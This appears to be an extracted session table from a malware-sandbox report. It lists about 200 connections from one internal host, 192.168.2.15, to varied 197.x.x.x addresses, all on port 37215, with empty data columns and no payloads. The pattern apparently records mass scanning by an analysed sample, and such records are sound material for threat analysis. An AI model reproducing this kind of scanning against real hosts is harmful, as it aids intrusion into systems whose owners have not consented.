                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28604192.168.2.1537880197.243.57.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28605192.168.2.1553904197.93.186.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28606192.168.2.1549040197.174.61.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28607192.168.2.1550570197.10.104.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28608192.168.2.1552516197.174.10.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28609192.168.2.1542644197.27.138.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28610192.168.2.1553514197.100.247.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28611192.168.2.1550296197.67.25.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28612192.168.2.1533540197.6.250.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28613192.168.2.1543138197.148.127.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28614192.168.2.1549082197.166.165.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28615192.168.2.1548530197.29.150.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28616192.168.2.1540736197.168.31.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28617192.168.2.1558362197.40.253.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28618192.168.2.1560528197.90.247.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28619192.168.2.1555502197.186.255.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28620192.168.2.1557678197.92.91.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28621192.168.2.1557656197.63.200.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28622192.168.2.1543820197.97.97.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28623192.168.2.1543330197.137.157.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28624192.168.2.1559350197.37.126.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28625192.168.2.1534734197.128.20.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28626192.168.2.1559576197.255.55.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28627192.168.2.1543096197.62.181.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28628192.168.2.1558662197.117.172.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28629192.168.2.1545562197.104.49.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28630192.168.2.1548136197.52.154.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28631192.168.2.1554226197.47.193.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28632192.168.2.1553536197.245.112.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28633192.168.2.1535970197.212.61.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28634192.168.2.1550844197.148.173.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28635192.168.2.1559582197.255.18.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28636192.168.2.1534786197.115.64.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28637192.168.2.1544356197.80.206.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28638192.168.2.1560868197.25.176.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28639192.168.2.1543954197.188.171.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28640192.168.2.1539968197.227.244.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28641192.168.2.1539530197.32.208.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28642192.168.2.1554952197.229.175.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28643192.168.2.1546006197.54.0.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28644192.168.2.1539840197.249.72.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28645192.168.2.1550474197.160.182.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28646192.168.2.1535062197.223.194.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28647192.168.2.1539056197.171.186.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28648192.168.2.1541686197.18.101.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28649192.168.2.1537994197.241.37.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28650192.168.2.1544800197.46.237.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28651192.168.2.1536538197.13.181.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28652192.168.2.1549090197.177.177.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28653192.168.2.1535308197.130.226.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28654192.168.2.1533186197.164.82.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28655192.168.2.1533360197.76.67.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28656192.168.2.1560472197.255.54.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28657192.168.2.1558858197.47.253.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28658192.168.2.1548166197.6.130.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28659192.168.2.1549788197.252.29.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28660192.168.2.1545508197.49.170.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28661192.168.2.1554524197.1.109.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28662192.168.2.1542684197.61.87.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28663192.168.2.1534756197.26.34.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28664192.168.2.1540984197.72.170.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28665192.168.2.1541152197.224.241.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28666192.168.2.1550214197.150.77.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28667192.168.2.1536324197.186.199.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28668192.168.2.1560756197.188.195.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28669192.168.2.1539580197.196.8.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28670192.168.2.1533568197.215.228.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28671192.168.2.1558330197.176.195.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28672192.168.2.1534824197.154.155.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28673192.168.2.1539300197.86.247.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28674192.168.2.1558142197.242.204.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28675192.168.2.1559080197.181.108.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28676192.168.2.1537110197.159.1.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28677192.168.2.1538314197.124.178.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28678192.168.2.1533406197.57.119.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28679192.168.2.1548498197.236.37.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28680192.168.2.1543038197.45.192.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28681192.168.2.1534598197.119.195.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28682192.168.2.1550792197.129.70.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28683192.168.2.1560252197.105.30.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28684192.168.2.1534890197.98.250.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28685192.168.2.1559608197.167.17.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28686192.168.2.1547090197.209.186.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28687192.168.2.1553328197.209.247.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28688192.168.2.1542152197.167.142.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28689192.168.2.1549598197.109.73.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28690192.168.2.1541764197.20.237.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28691192.168.2.1560234197.138.209.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28692192.168.2.1538688197.113.103.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28693192.168.2.1547038197.174.72.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28694192.168.2.1554702197.113.111.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28695192.168.2.1549030197.243.18.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28696192.168.2.1535822197.128.195.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28697192.168.2.1541336197.183.32.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28698192.168.2.1537746197.131.237.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28699192.168.2.1558260197.9.150.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28700192.168.2.1544632197.15.20.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28701192.168.2.1534884197.186.14.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28702192.168.2.1535706197.133.197.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28703192.168.2.1545388197.78.236.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28704192.168.2.1555256197.238.69.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28705192.168.2.1545480197.126.172.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28706192.168.2.1546770197.65.9.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28707192.168.2.1560698197.134.71.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28708192.168.2.1553066197.83.203.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28709192.168.2.1553642197.164.14.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28710192.168.2.1554204197.46.186.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28711192.168.2.1535966197.83.171.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28712192.168.2.1547450197.175.216.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28713192.168.2.1551838197.145.228.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28714192.168.2.1553372197.105.61.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28715192.168.2.1536746197.200.68.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28716192.168.2.1547262197.230.129.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28717192.168.2.1549674197.208.250.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28718192.168.2.1558568197.68.111.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28719192.168.2.1552898197.178.81.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28720192.168.2.1538796197.167.62.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28721192.168.2.1553898197.76.75.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28722192.168.2.1556998197.55.113.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28723192.168.2.1540372197.46.84.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28724192.168.2.1544090197.157.16.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28725192.168.2.1550520197.177.102.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28726192.168.2.1554688197.243.141.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28727192.168.2.1560870197.207.33.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28728192.168.2.1560162197.141.246.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28729192.168.2.1542788197.65.147.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28730192.168.2.1551736197.13.181.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28731192.168.2.1545534197.105.122.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28732192.168.2.1545918197.83.95.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28733192.168.2.1559860197.83.209.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28734192.168.2.1537358197.184.32.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28735192.168.2.1551404197.155.170.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28736192.168.2.1548482197.152.140.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28737192.168.2.1538714197.27.67.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28738192.168.2.1537208197.116.165.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28739192.168.2.1548504197.132.148.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28740192.168.2.1558394197.140.12.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28741192.168.2.1547254197.244.200.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28742192.168.2.1556810197.151.97.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28743192.168.2.1545328197.128.142.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28744192.168.2.1540628197.27.12.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28745192.168.2.1539012197.141.22.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28746192.168.2.1533090197.216.156.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28747192.168.2.1548360197.44.219.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28748192.168.2.1540048197.135.92.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28749192.168.2.1534938197.15.22.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28750192.168.2.1541294197.192.108.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28751192.168.2.1538358197.202.132.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28752192.168.2.1540104197.186.28.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28753192.168.2.1548988197.88.165.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28754192.168.2.1542612197.2.116.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28755192.168.2.1551576197.101.144.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28756192.168.2.1545962197.188.234.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28757192.168.2.1556360197.250.166.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28758192.168.2.1540342197.2.131.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28759192.168.2.1554024197.83.136.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28760192.168.2.1536116197.225.179.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28761192.168.2.1537200197.233.75.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28762192.168.2.1543850197.49.136.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28763192.168.2.1551068197.150.215.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28764192.168.2.1555814197.133.53.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28765192.168.2.1553384197.106.60.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28766192.168.2.1548370197.129.172.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28767192.168.2.1541194197.163.103.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28768192.168.2.1549778197.152.236.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28769192.168.2.1539672197.209.112.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28770192.168.2.1551604197.60.91.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28771192.168.2.1536868197.45.215.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28772192.168.2.1543318197.212.107.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28773192.168.2.1550104197.146.170.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28774192.168.2.1553094197.86.48.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28775192.168.2.1549428197.175.200.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28776192.168.2.1547428197.71.56.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28777192.168.2.1547452197.101.229.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28778192.168.2.1546238197.7.43.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28779192.168.2.1546050197.152.167.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28780192.168.2.1548412197.229.65.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28781192.168.2.1547494197.15.254.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28782192.168.2.1560854197.153.194.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28783192.168.2.1535682197.62.128.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28784192.168.2.1553134197.231.164.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28785192.168.2.1554978197.238.220.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28786192.168.2.1537904197.123.168.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28787192.168.2.1545248197.181.153.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28788192.168.2.1543152197.78.184.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28789192.168.2.1546132197.5.112.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28790192.168.2.1544344197.22.170.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28791192.168.2.1555394197.136.148.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28792192.168.2.1535368197.162.93.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28793192.168.2.1541512197.73.55.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28794192.168.2.1541702197.32.72.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28795192.168.2.1552748197.52.254.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28796192.168.2.1533522197.228.227.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28797192.168.2.1535510197.114.95.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28798192.168.2.1555576197.169.149.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28799192.168.2.1539546197.115.140.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28800192.168.2.1545136197.198.250.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28801192.168.2.1542912197.124.223.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28802192.168.2.1534004197.81.198.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28803192.168.2.1551186197.189.97.21837215
